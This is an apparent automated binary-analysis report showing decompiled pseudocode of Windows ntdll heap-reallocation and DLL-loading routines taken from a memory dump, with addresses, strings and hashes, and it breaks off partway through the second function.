C-Code - Quality: 65%

			E02641238(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t123;
				signed int _t124;
				void* _t130;
				intOrPtr _t132;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				intOrPtr _t151;
				intOrPtr _t163;
				signed int _t173;
				signed int _t174;
				signed int _t178;
				short _t184;
				signed int _t193;
				signed int _t194;
				intOrPtr _t197;
				intOrPtr _t219;
				short* _t233;
				void* _t246;
				intOrPtr _t248;
				signed int _t251;
				signed int _t253;
				signed int _t254;
				void* _t255;
				void* _t256;

				_t246 = __edx;
				_push(0x18);
				_push(0x259d158);
				_t123 = E0259DF5C(__ebx, __edi, __esi);
				_t248 =  *((intOrPtr*)(_t255 + 8));
				 *((intOrPtr*)(_t255 + 8)) = _t248;
				 *((char*)(_t255 - 0x19)) = 0;
				 *(_t255 - 0x24) = 0;
				if(( *(_t248 + 0x44) & 0x01000000) == 0) {
					 *(_t255 - 4) = 0;
					 *(_t255 - 4) = 1;
					_t232 = "RtlReAllocateHeap";
					_t124 = E025A85CA(_t248, "RtlReAllocateHeap");
					__eflags = _t124;
					if(_t124 != 0) {
						 *(_t255 + 0xc) =  *(_t255 + 0xc) |  *(_t248 + 0x44) | 0x10000100;
						_t251 =  *(_t255 + 0x14);
						__eflags = _t251;
						if(_t251 == 0) {
							_t235 = 1;
							__eflags = 1;
						} else {
							_t235 = _t251;
						}
						_t130 = ( *((intOrPtr*)(_t248 + 0x98)) + _t235 &  *(_t248 + 0x9c)) + 8;
						__eflags = _t130 - _t251;
						if(_t130 < _t251) {
							L66:
							_t132 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t132 + 0xc);
							if( *(_t132 + 0xc) == 0) {
								_push("HEAP: ");
								E025E373B();
							} else {
								E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push( *((intOrPtr*)(_t248 + 0x7c)));
							E025E373B("Invalid allocation size - %x (exceeded %x)\n", _t251);
							E026406F9(0);
							_t117 = _t255 - 0x24;
							 *_t117 =  *(_t255 - 0x24) & 0x00000000;
							__eflags =  *_t117;
							goto L71;
						} else {
							__eflags = _t130 -  *((intOrPtr*)(_t248 + 0x7c));
							if(_t130 >  *((intOrPtr*)(_t248 + 0x7c))) {
								goto L66;
							}
							__eflags =  *(_t255 + 0xc) & 0x00000001;
							if(__eflags == 0) {
								E025922D0(__eflags,  *((intOrPtr*)(_t248 + 0xcc)));
								 *((char*)(_t255 - 0x19)) = 1;
								_t26 = _t255 + 0xc;
								 *_t26 =  *(_t255 + 0xc) | 0x00000001;
								__eflags =  *_t26;
							}
							E0264098E(_t235, _t246, _t248, 0);
							_t253 =  *((intOrPtr*)(_t255 + 0x10)) + 0xfffffff8;
							__eflags =  *((char*)(_t253 + 7)) - 5;
							if( *((char*)(_t253 + 7)) == 5) {
								_t253 = _t253 - (( *(_t253 + 6) & 0x000000ff) << 3);
								__eflags = _t253;
							}
							_t145 = E025D0ED7(_t235, _t248, _t253, _t232);
							__eflags = _t145;
							if(_t145 == 0) {
								L52:
								_t146 =  *(_t255 - 0x24);
								__eflags = _t146;
								if(_t146 == 0) {
									L71:
									_t119 = _t255 - 4;
									 *_t119 =  *(_t255 - 4) & 0x00000000;
									__eflags =  *_t119;
									 *(_t255 - 4) = 0xfffffffe;
									E026416C3();
									_t123 =  *(_t255 - 0x24);
									goto L72;
								}
								__eflags = _t146 -  *0x2677928; // 0x0
								if(__eflags != 0) {
									_t147 = E025A8131();
									__eflags = _t147 & 0x00000800;
									if((_t147 & 0x00000800) == 0) {
										goto L71;
									}
									__eflags =  *(_t255 - 0x20) -  *0x267792c; // 0x0
									if(__eflags != 0) {
										goto L71;
									}
									__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0x267792e; // 0x0
									if(__eflags != 0) {
										goto L71;
									}
									_t151 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *(_t151 + 0xc);
									if( *(_t151 + 0xc) == 0) {
										_push("HEAP: ");
										E025E373B();
									} else {
										E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
									}
									_push(E0262F719(_t248,  *(_t255 - 0x20)));
									_push( *(_t255 + 0x14));
									E025E373B("Just reallocated block at %p to 0x%x bytes with tag %ws\n",  *(_t255 - 0x24));
									L58:
									E026406F9(0);
									goto L71;
								}
								_t163 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t163 + 0xc);
								if( *(_t163 + 0xc) == 0) {
									_push("HEAP: ");
									E025E373B();
								} else {
									E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t255 + 0x14));
								E025E373B("Just reallocated block at %p to %x bytes\n",  *0x2677928);
								goto L58;
							} else {
								__eflags =  *((intOrPtr*)(_t255 + 0x10)) -  *0x2677928; // 0x0
								if(__eflags != 0) {
									_t173 = E025A8131();
									__eflags = _t173 & 0x00000800;
									if((_t173 & 0x00000800) == 0) {
										L37:
										_t174 = E025AC7BC(_t248,  *(_t255 + 0xc),  *((intOrPtr*)(_t255 + 0x10)),  *(_t255 + 0x14));
										 *(_t255 - 0x24) = _t174;
										__eflags = _t174;
										if(_t174 != 0) {
											_t70 = _t174 - 8; // -8
											_t254 = _t70;
											__eflags =  *((char*)(_t254 + 7)) - 5;
											if( *((char*)(_t254 + 7)) == 5) {
												_t254 = _t254 - (( *(_t254 + 6) & 0x000000ff) << 3);
												__eflags = _t254;
											}
											__eflags =  *(_t248 + 0x4c);
											if( *(_t248 + 0x4c) != 0) {
												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
												__eflags =  *(_t254 + 3) - ( *(_t254 + 2) ^  *(_t254 + 1) ^  *_t254);
												if(__eflags != 0) {
													_push(0);
													_push(_t254);
													_push(_t248);
													E0263F8EE(_t232, _t248, _t254, __eflags);
												}
											}
											__eflags =  *(_t254 + 2) & 0x00000002;
											if(( *(_t254 + 2) & 0x00000002) == 0) {
												_t178 =  *(_t254 + 3) & 0xff;
											} else {
												_t233 = E025C2568(_t254);
												__eflags =  *(_t248 + 0x40) & 0x08000000;
												if(( *(_t248 + 0x40) & 0x08000000) == 0) {
													_t184 = 0;
													__eflags = 0;
												} else {
													_t184 = E02639AF6();
												}
												 *_t233 = _t184;
												_t178 =  *(_t233 + 2) & 0x0000ffff;
											}
											 *(_t255 - 0x20) = _t178;
											__eflags =  *(_t248 + 0x4c);
											if( *(_t248 + 0x4c) != 0) {
												_t235 =  *(_t254 + 2) & 0x000000ff;
												 *(_t254 + 3) =  *(_t254 + 1) & 0x000000ff ^  *_t254 & 0x000000ff ^  *(_t254 + 2) & 0x000000ff;
												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
												__eflags =  *_t254;
											}
										}
										E0263FB7A(_t235, _t246, _t248, 1);
										E0264098E(_t235, _t246, _t248, 0);
										goto L52;
									}
									_t232 = 0;
									__eflags =  *0x267792c - _t232; // 0x0
									if(__eflags == 0) {
										goto L37;
									}
									__eflags =  *(_t248 + 0x4c);
									if( *(_t248 + 0x4c) != 0) {
										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
										__eflags =  *(_t253 + 3) - ( *(_t253 + 2) ^  *(_t253 + 1) ^  *_t253);
										if(__eflags != 0) {
											_push(0);
											_push(_t253);
											_push(_t248);
											E0263F8EE(0, _t248, _t253, __eflags);
										}
									}
									__eflags =  *(_t253 + 2) & 0x00000002;
									if(( *(_t253 + 2) & 0x00000002) == 0) {
										_t193 =  *(_t253 + 3) & 0xff;
									} else {
										_t193 =  *(E025C2568(_t253) + 2) & 0x0000ffff;
									}
									 *(_t255 - 0x20) = _t193;
									__eflags =  *(_t248 + 0x4c) - _t232;
									if( *(_t248 + 0x4c) != _t232) {
										_t235 =  *(_t253 + 2) & 0x000000ff;
										 *(_t253 + 3) =  *(_t253 + 1) & 0x000000ff ^  *_t253 & 0x000000ff ^  *(_t253 + 2) & 0x000000ff;
										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
										__eflags =  *_t253;
									}
									_t194 =  *(_t255 - 0x20);
									__eflags = _t194 - _t232;
									if(_t194 != _t232) {
										__eflags = _t194 -  *0x267792c; // 0x0
										if(__eflags != 0) {
											goto L37;
										}
										__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0x267792e; // 0x0
										if(__eflags != 0) {
											goto L37;
										}
										_t197 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *((intOrPtr*)(_t197 + 0xc)) - _t232;
										if( *((intOrPtr*)(_t197 + 0xc)) == _t232) {
											_push("HEAP: ");
											E025E373B();
										} else {
											E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_pop(_t235);
										_push(E0262F719(_t248,  *(_t255 - 0x20)));
										_push( *(_t255 + 0x14));
										E025E373B("About to rellocate block at %p to 0x%x bytes with tag %ws\n",  *((intOrPtr*)(_t255 + 0x10)));
										_t256 = _t256 + 0x10;
										_push(_t232);
										L36:
										E026406F9();
									}
									goto L37;
								}
								_t219 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t219 + 0xc);
								if( *(_t219 + 0xc) == 0) {
									_push("HEAP: ");
									E025E373B();
								} else {
									E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_pop(_t235);
								_push( *(_t255 + 0x14));
								E025E373B("About to reallocate block at %p to %x bytes\n",  *0x2677928);
								_t256 = _t256 + 0xc;
								_push(0);
								goto L36;
							}
						}
					}
					 *(_t255 - 0x24) = 0;
					goto L71;
				} else {
					_push( *(_t255 + 0x14));
					_push( *((intOrPtr*)(_t255 + 0x10)));
					_push( *(_t255 + 0xc));
					_push(_t248);
					E0263E765();
					L72:
					return E0259DFA1(_t123);
				}
			}

0x02641238
0x02641238
0x0264123a
0x0264123f
0x02641244
0x02641247
0x0264124a
0x02641250
0x0264125a
0x02641270
0x02641273
0x0264127a
0x02641281
0x02641286
0x02641288
0x0264129a
0x0264129d
0x026412a0
0x026412a2
0x026412aa
0x026412aa
0x026412a4
0x026412a4
0x026412a4
0x026412b9
0x026412bc
0x026412be
0x02641616
0x0264161c
0x0264161f
0x02641623
0x02641645
0x0264164a
0x02641625
0x0264163d
0x02641642
0x02641650
0x02641659
0x02641663
0x0264169f
0x0264169f
0x0264169f
0x00000000
0x026412c4
0x026412c4
0x026412c7
0x00000000
0x00000000
0x026412cd
0x026412d1
0x026412d9
0x026412de
0x026412e2
0x026412e2
0x026412e2
0x026412e2
0x026412e9
0x026412f1
0x026412f4
0x026412f8
0x02641301
0x02641301
0x02641301
0x02641306
0x0264130b
0x0264130d
0x02641516
0x02641516
0x02641519
0x0264151b
0x026416a3
0x026416a3
0x026416a3
0x026416a3
0x026416a7
0x026416ae
0x026416b3
0x00000000
0x026416b3
0x02641521
0x02641527
0x02641585
0x0264158a
0x0264158f
0x00000000
0x00000000
0x02641599
0x026415a0
0x00000000
0x00000000
0x026415ad
0x026415b4
0x00000000
0x00000000
0x026415c0
0x026415c3
0x026415c7
0x026415e9
0x026415ee
0x026415c9
0x026415e1
0x026415e6
0x026415fd
0x026415fe
0x02641609
0x02641579
0x0264157b
0x00000000
0x0264157b
0x0264152f
0x02641532
0x02641536
0x02641558
0x0264155d
0x02641538
0x02641550
0x02641555
0x02641563
0x02641571
0x00000000
0x02641313
0x02641316
0x0264131c
0x02641375
0x0264137a
0x0264137f
0x02641468
0x02641472
0x02641477
0x0264147a
0x0264147c
0x02641482
0x02641482
0x02641485
0x02641489
0x02641492
0x02641492
0x02641492
0x02641494
0x02641498
0x0264149d
0x026414a7
0x026414aa
0x026414ac
0x026414ae
0x026414af
0x026414b0
0x026414b0
0x026414aa
0x026414b5
0x026414b9
0x026414e3
0x026414bb
0x026414c1
0x026414c3
0x026414ca
0x026414d3
0x026414d3
0x026414cc
0x026414cc
0x026414cc
0x026414d5
0x026414d8
0x026414d8
0x026414e6
0x026414e9
0x026414ed
0x026414f8
0x026414fe
0x02641504
0x02641504
0x02641504
0x026414ed
0x02641509
0x02641511
0x00000000
0x02641511
0x02641385
0x02641387
0x0264138d
0x00000000
0x00000000
0x02641393
0x02641396
0x0264139b
0x026413a5
0x026413a8
0x026413aa
0x026413ab
0x026413ac
0x026413ad
0x026413ad
0x026413a8
0x026413b2
0x026413b6
0x026413c9
0x026413b8
0x026413be
0x026413be
0x026413cc
0x026413cf
0x026413d2
0x026413dd
0x026413e3
0x026413e9
0x026413e9
0x026413e9
0x026413eb
0x026413ee
0x026413f1
0x026413f3
0x026413fa
0x00000000
0x00000000
0x02641403
0x0264140a
0x00000000
0x00000000
0x02641412
0x02641415
0x02641418
0x0264143a
0x0264143f
0x0264141a
0x02641432
0x02641437
0x02641444
0x0264144e
0x0264144f
0x0264145a
0x0264145f
0x02641462
0x02641463
0x02641463
0x02641463
0x00000000
0x026413f1
0x02641324
0x02641327
0x0264132b
0x0264134d
0x02641352
0x0264132d
0x02641345
0x0264134a
0x02641357
0x02641358
0x02641366
0x0264136b
0x0264136e
0x00000000
0x0264136e
0x0264130d
0x026412be
0x0264128a
0x00000000
0x0264125c
0x0264125c
0x0264125f
0x02641262
0x02641265
0x02641266
0x026416b6
0x026416bb
0x026416bb

Strings

About to rellocate block at %p to 0x%x bytes with tag %ws, xrefs: 02641455
About to reallocate block at %p to %x bytes, xrefs: 02641361
HEAP: , xrefs: 0264134D, 0264143A, 02641558, 026415E9, 02641645
Invalid allocation size - %x (exceeded %x), xrefs: 02641654
Just reallocated block at %p to 0x%x bytes with tag %ws, xrefs: 02641604
HEAP[%wZ]: , xrefs: 02641340, 0264142D, 0264154B, 026415DC, 02641638
Just reallocated block at %p to %x bytes, xrefs: 0264156C
RtlReAllocateHeap, xrefs: 0264127A, 0264127F, 02641303

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: About to reallocate block at %p to %x bytes$About to rellocate block at %p to 0x%x bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %x (exceeded %x)$Just reallocated block at %p to %x bytes$Just reallocated block at %p to 0x%x bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-3744532478
Opcode ID: a27c97ed79c903942fdf080f34963eb3d8189d92f9b578b946717c9ad70876df
Instruction ID: 747cca93b70174da72ecdcc46948d65827f9794caff58e31a0ab731543f8ddaf
Opcode Fuzzy Hash: a27c97ed79c903942fdf080f34963eb3d8189d92f9b578b946717c9ad70876df
Instruction Fuzzy Hash: 34C1F671500655AFEB26DF64C845BBABBF1BF0A714F048088F8CA97641CB34E985CF64

Uniqueness

Uniqueness Score: -1.00%

Function 025AE6C1, Relevance: 9.4, Strings: 7, Instructions: 626
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E025AE6C1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t254;
				signed int _t257;
				signed int _t258;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t288;
				signed int _t290;
				signed int _t299;
				intOrPtr _t300;
				intOrPtr _t303;
				intOrPtr _t304;
				intOrPtr* _t319;
				intOrPtr* _t320;
				intOrPtr* _t321;
				intOrPtr _t324;
				signed int _t328;
				intOrPtr _t331;
				intOrPtr* _t332;
				signed short _t333;
				signed int _t336;
				intOrPtr _t347;
				signed int _t348;
				intOrPtr _t355;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed short* _t388;
				signed short* _t390;
				signed int _t391;
				signed int _t401;
				intOrPtr _t403;
				intOrPtr* _t405;
				signed int _t406;
				intOrPtr _t407;
				signed int _t410;
				signed int _t411;
				intOrPtr* _t414;
				intOrPtr* _t416;
				signed int _t417;
				intOrPtr* _t418;
				void* _t419;
				void* _t421;
				void* _t422;

				_push(0xb4);
				_push(0x259be58);
				E0259DF5C(__ebx, __edi, __esi);
				_t254 =  *0x259f78c; // 0x8
				_t416 =  *((intOrPtr*)(_t421 + 0xc));
				if(( *0x26777a0 & (_t254 | 0x00000001)) != 0) {
					_push(_t416);
					E0260F970(__ebx, "d:\\w7rtm\\minkernel\\ntdll\\ldrfind.c", 0xe7, "LdrpFindOrMapDll", 3, "DLL name: %wZ DLL path: %wZ\n",  *(_t421 + 8));
					_t422 = _t422 + 0x1c;
				}
				_t257 =  *0x26777a0; // 0x0
				if(( *0x259f790 & _t257) != 0) {
					asm("int3");
				}
				_t410 = 0;
				 *(_t421 - 0x24) = 0;
				 *((intOrPtr*)(_t421 - 0x5c)) = 0;
				 *((intOrPtr*)(_t421 - 0x4c)) = 0;
				 *(_t421 - 0x28) = 0;
				 *(_t421 + 0xf) = 0;
				_t401 = 0;
				if( *(_t421 + 0x18) != 0) {
					_t258 = E0259FA50(0,  *(_t421 + 8),  *((intOrPtr*)(_t421 + 0x1c)));
					__eflags = _t258;
					if(_t258 != 0) {
						goto L13;
					}
					_t411 = E025B1A18(_t406,  *(_t421 + 8), _t421 - 0x3c);
					__eflags = _t411;
					if(_t411 < 0) {
						goto L14;
					}
					_t411 = E025B1AC6(_t402,  *(_t421 + 8), _t421 - 0x48, _t421 - 0x34);
					__eflags = _t411;
					if(_t411 < 0) {
						E0259E1C6(_t421 - 0x3c);
						goto L14;
					}
					 *(_t421 - 0x24) = 0x10000000;
					goto L84;
				} else {
					_t388 =  *(_t421 + 8);
					_t402 = _t388[2];
					_t390 = ( *_t388 & 0x0000ffff) + _t402 - 2;
					while(_t390 >= _t402) {
						_t406 =  *_t390 & 0x0000ffff;
						if(_t406 == 0x5c || _t406 == 0x2f) {
							 *(_t421 + 0xf) = 1;
							break;
						} else {
							_t390 = _t390;
							continue;
						}
					}
					__eflags =  *(_t421 + 0xf);
					if( *(_t421 + 0xf) == 0) {
						_t391 = E0259FA50( *(_t421 + 8), _t410,  *((intOrPtr*)(_t421 + 0x1c)));
						__eflags = _t391;
						if(_t391 != 0) {
							L13:
							 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
							_t411 = 0;
							__eflags = 0;
							L14:
							_t260 =  *0x259f798; // 0x8
							_t261 = _t260 | 0x00000001;
							__eflags =  *0x26777a0 & _t261;
							if(( *0x26777a0 & _t261) != 0) {
								E0260F970(_t401, "d:\\w7rtm\\minkernel\\ntdll\\ldrfind.c", 0x2d9, "LdrpFindOrMapDll", 4, "Status: 0x%08lx\n", _t411);
							}
							_t263 =  *0x26777a0; // 0x0
							__eflags =  *0x259f79c & _t263;
							if(( *0x259f79c & _t263) != 0) {
								asm("int3");
							}
							return E0259DFA1(_t411);
						}
						_t411 = E025AFBDF(_t410,  *(_t421 + 8), 0xf, _t421 - 0x48, _t421 - 0x34, _t421 - 0x2c);
						__eflags = _t411;
						if(_t411 < 0) {
							__eflags = _t411 - 0xc0000135;
							if(_t411 == 0xc0000135) {
								_t410 = 0;
								goto L10;
							}
							goto L14;
						}
						L19:
						_t290 = E0259E893(_t421 - 0x48, 0x25aed64, 1);
						__eflags = _t290;
						 *((char*)(_t421 + 0x10)) = _t290 & 0xffffff00 | _t290 != 0x00000000;
						_t411 = E025ABC87(_t406, _t416,  *((intOrPtr*)(_t421 - 0x2c)),  *((intOrPtr*)(_t421 - 0x44)),  *((intOrPtr*)(_t421 - 0x30)),  *((intOrPtr*)(_t421 + 0x10)), _t421 - 0x1c, _t421 - 0x54);
						_t401 = 0;
						__eflags = _t411;
						if(__eflags < 0) {
							L29:
							E0258F9F0( *((intOrPtr*)(_t421 - 0x2c)));
							__eflags =  *(_t421 - 0x28) - _t401;
							if( *(_t421 - 0x28) == _t401) {
								L32:
								E0259E025(_t402,  *0x2670104, 0,  *((intOrPtr*)(_t421 - 0x30)));
								goto L14;
							}
							L30:
							E0258F9F0( *(_t421 - 0x28));
							L31:
							E0259E1C6(_t421 - 0x3c);
							goto L32;
						}
						 *(_t421 + 0x18) = _t411;
						_push(_t421 - 0x20);
						_push(0);
						_push( *((intOrPtr*)(_t421 - 0x54)));
						_push( *((intOrPtr*)(_t421 - 0x1c)));
						_push(0);
						_t411 = E0259F535(_t411, _t416, __eflags);
						__eflags = _t411;
						if(_t411 < 0) {
							L28:
							_push( *((intOrPtr*)(_t421 - 0x1c)));
							E0258FC90(0xffffffff);
							goto L29;
						}
						__eflags =  *(_t421 + 0xf);
						if( *(_t421 + 0xf) != 0) {
							_t299 = E025B1603( *((intOrPtr*)(_t421 - 0x1c)),  *((intOrPtr*)(_t421 - 0x20)),  *((intOrPtr*)(_t421 + 0x1c)));
							__eflags = _t299;
							if(_t299 == 0) {
								goto L22;
							}
							 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
							_t411 = 0;
							goto L28;
						}
						L22:
						__eflags =  *0x26700d8 - 0x2000;
						if( *0x26700d8 == 0x2000) {
							_t402 = 0x10b;
							_t300 =  *((intOrPtr*)(_t421 - 0x20));
							__eflags =  *((intOrPtr*)(_t300 + 0x18)) - 0x10b;
							if( *((intOrPtr*)(_t300 + 0x18)) != 0x10b) {
								goto L23;
							}
							__eflags =  *((intOrPtr*)(_t300 + 0x38)) - 0x1000;
							if( *((intOrPtr*)(_t300 + 0x38)) != 0x1000) {
								goto L23;
							}
							_push(_t401);
							_push(0x30);
							_push(_t421 - 0xc4);
							_push(1);
							E02590060( *((intOrPtr*)(_t421 - 0x2c)));
							__eflags =  *(_t421 - 0xa1) & 0x00000008;
							if(__eflags == 0) {
								goto L23;
							}
							 *(_t421 - 4) = _t401;
							_t411 = E02615F1D(0x10b, _t406, __eflags, _t421 - 0x34,  *((intOrPtr*)(_t421 - 0x20)),  *((intOrPtr*)(_t421 - 0x1c)));
							 *(_t421 - 0x70) = _t411;
							 *(_t421 - 4) = 0xfffffffe;
							__eflags = _t411 - _t401;
							if(_t411 >= _t401) {
								goto L23;
							} else {
								goto L28;
							}
						}
						L23:
						_t417 = E0259F5E6( *((intOrPtr*)(_t421 - 0x1c)), 1, 0xe, _t421 - 0x8c);
						 *(_t421 - 0x58) = _t417;
						__eflags = _t417 - _t401;
						if(_t417 != _t401) {
							__eflags =  *(_t417 + 0x10) & 0x00000001;
							if(( *(_t417 + 0x10) & 0x00000001) == 0) {
								goto L24;
							}
							_t380 = E025C855C(_t401, _t411, _t421 - 0x1c,  *((intOrPtr*)(_t421 - 0x30)));
							_t411 = _t380;
							__eflags = _t411 - _t401;
							if(_t411 < _t401) {
								goto L28;
							} else {
								 *(_t421 - 0x24) =  *(_t421 - 0x24) | 0x01400000;
								 *(_t421 + 0x18) = _t380;
								goto L24;
							}
							L73:
							_t336 =  *(_t421 - 0x58);
							__eflags =  *(_t336 + 0x10) & 0x00000001;
							if(( *(_t336 + 0x10) & 0x00000001) != 0) {
								L45:
								_t411 = 0;
								E025AEF95(_t418, 1, 0);
								E0258F9F0( *((intOrPtr*)(_t421 - 0x2c)));
								__eflags =  *(_t421 - 0x28);
								if( *(_t421 - 0x28) != 0) {
									E0258F9F0( *(_t421 - 0x28));
									E0259E1C6(_t421 - 0x3c);
								}
								 *((intOrPtr*)( *((intOrPtr*)(_t421 + 0x1c)))) = _t418;
								 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 1;
								goto L14;
							}
							_t411 = E025C855C(_t401, _t414, _t421 - 0x1c,  *((intOrPtr*)(_t421 - 0x30)));
							__eflags = _t411;
							if(_t411 < 0) {
								E0259E025(_t402,  *0x2670104, 0, _t418);
								_t401 = 0;
								__eflags = 0;
								L121:
								__eflags =  *(_t421 - 0x24) & 0x00400000;
								if(__eflags != 0) {
									E02610010(_t401, _t411, _t418, __eflags,  *((intOrPtr*)(_t421 - 0x1c)));
								}
								goto L28;
							}
							 *(_t418 + 0x34) =  *(_t418 + 0x34) | 0x00000004;
							goto L45;
						}
						L24:
						__eflags =  *(_t421 + 0x18) - 0x4000000e;
						if(__eflags != 0) {
							__eflags =  *(_t421 + 0x14) & 0x00800000;
							if(( *(_t421 + 0x14) & 0x00800000) == 0) {
								L117:
								_t303 =  *((intOrPtr*)(_t421 - 0x20));
								L33:
								_t402 = 0x2000;
								__eflags =  *(_t303 + 0x16) & 0x00002000;
								if(( *(_t303 + 0x16) & 0x00002000) == 0) {
									L35:
									_t304 =  *0x2670058; // 0x0
									_t418 = E0259E0C6( *0x2670104, _t304 + 0x40000, 0x78);
									__eflags = _t418 - _t401;
									if(_t418 == _t401) {
										_t411 = 0xc0000017;
										goto L121;
									} else {
										 *((intOrPtr*)(_t418 + 0x18)) =  *((intOrPtr*)(_t421 - 0x1c));
										__eflags =  *(_t421 - 0x24) & 0x00000004;
										if(( *(_t421 - 0x24) & 0x00000004) == 0) {
											 *(_t418 + 0x1c) = _t401;
										} else {
											_t347 =  *((intOrPtr*)(_t421 - 0x20));
											__eflags =  *((intOrPtr*)(_t347 + 0x28)) - _t401;
											if( *((intOrPtr*)(_t347 + 0x28)) == _t401) {
												_t348 = 0;
											} else {
												_t348 =  *((intOrPtr*)(_t347 + 0x28)) +  *((intOrPtr*)(_t421 - 0x1c));
												__eflags = _t348;
											}
											 *(_t418 + 0x1c) = _t348;
										}
										 *((intOrPtr*)(_t418 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t421 - 0x20)) + 0x50));
										 *((intOrPtr*)(_t418 + 0x24)) =  *(_t421 - 0x34);
										 *((intOrPtr*)(_t418 + 0x28)) =  *((intOrPtr*)(_t421 - 0x30));
										_t91 = _t418 + 0x2c; // 0x2c
										_t401 = _t91;
										 *_t401 =  *((intOrPtr*)(_t421 - 0x48));
										 *((intOrPtr*)(_t401 + 4)) =  *((intOrPtr*)(_t421 - 0x44));
										 *(_t418 + 0x34) =  *(_t421 - 0x24);
										 *((short*)(_t418 + 0x38)) = 0;
										 *((short*)(_t418 + 0x3a)) = 0;
										 *((intOrPtr*)(_t418 + 0x44)) =  *((intOrPtr*)( *((intOrPtr*)(_t421 - 0x20)) + 8));
										__eflags = 0;
										 *((intOrPtr*)(_t418 + 0x48)) = 0;
										 *((intOrPtr*)(_t418 + 0x4c)) = 0;
										_t104 = _t418 + 0x50; // 0x50
										_t319 = _t104;
										 *((intOrPtr*)(_t319 + 4)) = _t319;
										 *_t319 = _t319;
										_t106 = _t418 + 0x58; // 0x58
										_t320 = _t106;
										 *((intOrPtr*)(_t320 + 4)) = _t320;
										 *_t320 = _t320;
										_t108 = _t418 + 0x60; // 0x60
										_t321 = _t108;
										 *((intOrPtr*)(_t321 + 4)) = _t321;
										 *_t321 = _t321;
										 *((intOrPtr*)(_t418 + 0x68)) = 0;
										 *(_t418 + 0x6c) =  *( *((intOrPtr*)(_t421 - 0x20)) + 0x34);
										_t324 =  *0x7ffe0018;
										_t403 =  *0x7ffe0014;
										_t407 =  *0x7ffe001c;
										while(1) {
											__eflags = _t324 - _t407;
											if(_t324 == _t407) {
												break;
											}
											asm("pause");
											_t324 =  *0x7ffe0018;
											_t403 =  *0x7ffe0014;
											_t407 =  *0x7ffe001c;
										}
										 *((intOrPtr*)(_t418 + 0x70)) = _t403;
										 *((intOrPtr*)(_t418 + 0x74)) = _t324;
										_push(0);
										_push(4);
										_push(_t421 - 0x6c);
										_push(2);
										E02590060( *((intOrPtr*)(_t421 - 0x2c)));
										_t328 =  *(_t421 - 0x6c);
										__eflags = _t328;
										if(_t328 != 0) {
											_t119 = _t418 + 0x6c;
											 *_t119 =  *(_t418 + 0x6c) - _t328;
											__eflags =  *_t119;
										}
										_t121 = _t418 + 0x3c; // 0x3c
										_t414 = _t121;
										_t331 = 0x2674820 + (E0259FAC1(_t401) & 0x0000001f) * 8;
										_t405 =  *((intOrPtr*)(_t331 + 4));
										 *_t414 = _t331;
										 *((intOrPtr*)(_t414 + 4)) = _t405;
										 *_t405 = _t414;
										 *((intOrPtr*)(_t331 + 4)) = _t414;
										_t332 =  *0x2670210; // 0x737ce8
										 *_t418 = 0x267020c;
										 *((intOrPtr*)(_t418 + 4)) = _t332;
										 *_t332 = _t418;
										 *0x2670210 = _t418;
										_t128 = _t418 + 8; // 0x8
										_t333 = _t128;
										_t402 =  *0x2670218; // 0x737cf0
										 *_t333 = 0x2670214;
										 *(_t333 + 4) = _t402;
										 *_t402 = _t333;
										 *0x2670218 = _t333;
										E025B04F2(_t401, _t402, _t407, _t414, 0x2672200,  *((intOrPtr*)(_t418 + 0x18)),  *((intOrPtr*)(_t418 + 0x20)));
										E025B02AC(_t402, _t418);
										__eflags =  *(_t421 - 0x58);
										if( *(_t421 - 0x58) != 0) {
											goto L73;
										} else {
											goto L45;
										}
									}
								}
								 *(_t421 - 0x24) =  *(_t421 - 0x24) | 0x00000004;
								__eflags =  *(_t421 + 0x18) - 0x40000003;
